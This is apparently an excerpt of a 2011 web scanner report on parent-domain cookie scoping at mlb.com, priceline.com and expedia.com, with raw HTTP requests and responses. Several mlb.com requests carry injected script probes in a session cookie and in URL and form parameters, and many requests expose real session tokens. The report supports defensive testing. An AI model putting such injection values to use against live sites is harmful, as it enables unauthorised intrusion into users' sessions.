Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8iYRfBnjTm0AKidBJJtijrikiNQKoSbqAbREwl5IF4OIJ.KJeqKekCc0SAYVI1V0Ulo0cqowUloxyC4aSSDB3A7RSbnSo9IqBkFP0AhJTqOgphyDcY-KRvmTklrwoXpwUUF9cMmmyZm8c0yvznFyjpOzeufSQvH9FOsAIoYx0qbMJkxHhOmIMBUWfGGCEVwdVY08BnF5u-JMJ6buRpSP7hXhPw__; expires=Sat, 01-Oct-2016 00:40:41 GMT; path=/; domain=.estara.com
Expires: Wed, 02 Nov 2011 00:40:41 GMT
Content-Length: 26085
Content-Type: text/javascript; charset=UTF-8

eStara_obscuration['87123']='bookCreditCardNumber';eStara_obscuration['72139']='offer(.*)CREDIT_CARD_NUM|offer(.*)credit_card|offer(.*)CREDIT_CARD_NUM(.*)';eStara_obscuration['72149']='offer(.*)EXPIRA
...[SNIP]...
13.3. https://secure.mlb.com/resetPassword.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /resetPassword.do HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

uri=%2Faccount%2Fforgot_password.jsp&emailAddress=*%2F%0Adocument.title%3D1317599291294048%2F*

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:21 GMT
Content-type: text/html;charset=utf-8
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 76221


                       
...[SNIP]...
13.4. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /shared/scripts/bam/bam.env.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/scripts/bam/bam.env.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Accept-Language: en-us
Referer: https://secure.mlb.com/resetPassword.do
Accept: */*
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:42 GMT
Expires: Mon, 03 Oct 2011 01:48:42 GMT
Edge-control: max-age=7200
Content-type: text/javascript;charset=ISO-8859-1
Content-length: 811
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/


(function (window, $, bam) {

bam.env = bam.env || {};
bam.env.host = bam.env.host || {};

$.extend(bam.env.host, {

/**
* Returns base url for the CDN server

...[SNIP]...
13.5. https://secure.mlb.com/style/bam.css.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/bam.css.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/bam.css.jsp?c_id=%0Adocument.title=1317599335378049; HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:58 GMT
Expires: Mon, 03 Oct 2011 01:48:58 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 9935


/* buttons */
/* global */
.bam-button {
font-family:"Helvetica", "Helvetica Neue", arial, sans-serif;
font-size:13px;
font-weight:bold;
text-decoration:none;
-moz-border-r
...[SNIP]...
13.6. https://secure.mlb.com/style/nav_2011.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/nav_2011.jsp?c_id=%0Adocument.title=1317599336102051;&section=schedule HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:59 GMT
Expires: Mon, 03 Oct 2011 01:48:59 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 16918


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...
13.7. http://travela.priceline.com/hotel/leaveBehindPop.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/leaveBehindPop.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/leaveBehindPop.do?INIT_SESSION=false&src_path=RTL&src_page=LIST&trySecSwap=Y&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011&city=Boston%2C+MA&displayCity=Boston&cityID=3000008602&numberOfRooms=1&country=US&static=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600744165:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.2.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:32:26 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5463010a2011100300322608e011577265; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=93E8720C5EB8B62C63F1FFE2A3CCE4FE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 959
Content-Type: text/html;charset=ISO-8859-1

<html>
<head>

<script language="Javascript">
function checkDom() {
   var sTest = "";
   var newURL;
   var thisURL = window.location.href;
   var bSecSwap = true;
   try{
       sTest = window.opener.doc
...[SNIP]...
13.8. http://travela.priceline.com/hotel/searchHotels.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 282
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:05 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a2011100300100584c011561872; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A10%3A05&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:10:05 GMT; Path=/
Set-Cookie: JSESSIONID=6F97BAD3EA8636704D7EC7753CCBB4DE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8901
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
13.9. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:02 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:17:52 GMT; Path=/
Content-Length: 426876

<!DOCTYPE html>
<!-- rendered by MVC -->
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="language" content=""/>

<m
...[SNIP]...
13.10. http://www.expedia.com/Details  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Details

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Details?action=UnifiedDetailsWidget@showDetails&rfrr=-56908&c=f80a6253-97ca-4b75-98ff-8895038babf3 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/TripPreferences?tripid=e0ec7dc7-accc-4a30-b5fb-7781275b132a&c=d8e96adc-f4c8-4481-b77d-30afb9785c2c
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:14 GMT
Connection: close
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:07:14 GMT; Path=/
Set-Cookie: JSESSION=31edaa66-8664-4539-91ca-3e8b6c692734; Domain=.expedia.com; Path=/
Set-Cookie: s1=`user=v.8,0,EX01E9F091F9$22$87001000$FF$5C37$0E$C1$C6!2$0E$C1$C6!2$0E$C1$C6$0E1000$11000$1E81!90$D1$9C$B9$EE$B3$32p$A2!i02000`125; Domain=.expedia.com; Path=/
Set-Cookie: p1=`accttype=v.2,8,1,EX014BD1106A$B48SBjmv$E3$7B$1Es$A7$BD3$18$E3$7D$14$5CM$B56$8F$E0j$13$F9$CBG$E6$F7v$A6`minfo=v.5,EX01EEEB4066$B48SBymv$FCb$10s$A7$BE3$18$E3$7D$14RM$B76$8F$E6j$13$FA$CEG$E6$F0v$916$3E$1Bn$2B$7D$2A$87$92$E2$FE$19$35$17Wf$0Bi$15$EC$26b$A33$93z$1Fd$871$12$3CM$7E`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247906574|1033|0|0||0|0|0|-1|-1`382; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:11:05 GMT; Path=/

13.11. http://www.expedia.com/Hotel-Search  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Hotel-Search HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 9102
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

piid=6da35fba-7158-407e-a148-c2d242f8e3c3&hart=16706&pqar=441.86&pqtr=&oldr=bGxpdmBu&rfrr=-56908&hwrq=EX013A5C34E0DNGD110300%2429%24AF008Tq%249C%24ADH%24CB%2492%241B%24B7%2415%2495%242C%24D9O%24EC%24B
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/Details?action=UnifiedDetailsWidget@showDetails&rfrr=-56908&c=86f50a38-52dd-41f7-9a0a-0e0cc39da211
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:16 GMT
Connection: close
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:07:09 GMT; Path=/
Set-Cookie: JSESSION=31edaa66-8664-4539-91ca-3e8b6c692734; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:10:59 GMT; Path=/

13.12. http://www.expedia.com/Hotel-Search-WidgetInitJS  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotel-Search-WidgetInitJS

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotel-Search-WidgetInitJS?action=widgetInitJS&v=release-2011-09-r3.10.274201 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; COOKIECHECK=1; iEAPID=00,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:28 GMT
Content-Length: 101505
Connection: close
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:38:28 GMT; Path=/
Set-Cookie: JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:42:18 GMT; Path=/

jQuery(document).ready(function($){
var $hotelSearchForm = $("#hotelSearchForm");
var $form = $("#hotelFilterForm");

$hotelSearchForm.bind("submit", function(e){
$hotelSe
...[SNIP]...
13.13. http://www.expedia.com/Hotels/Offers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels/Offers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Offers?action=getAndUpdateHotelProductActivity&hotelIds=894999&durationForViews=1800000&durationForBookings=172800000 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
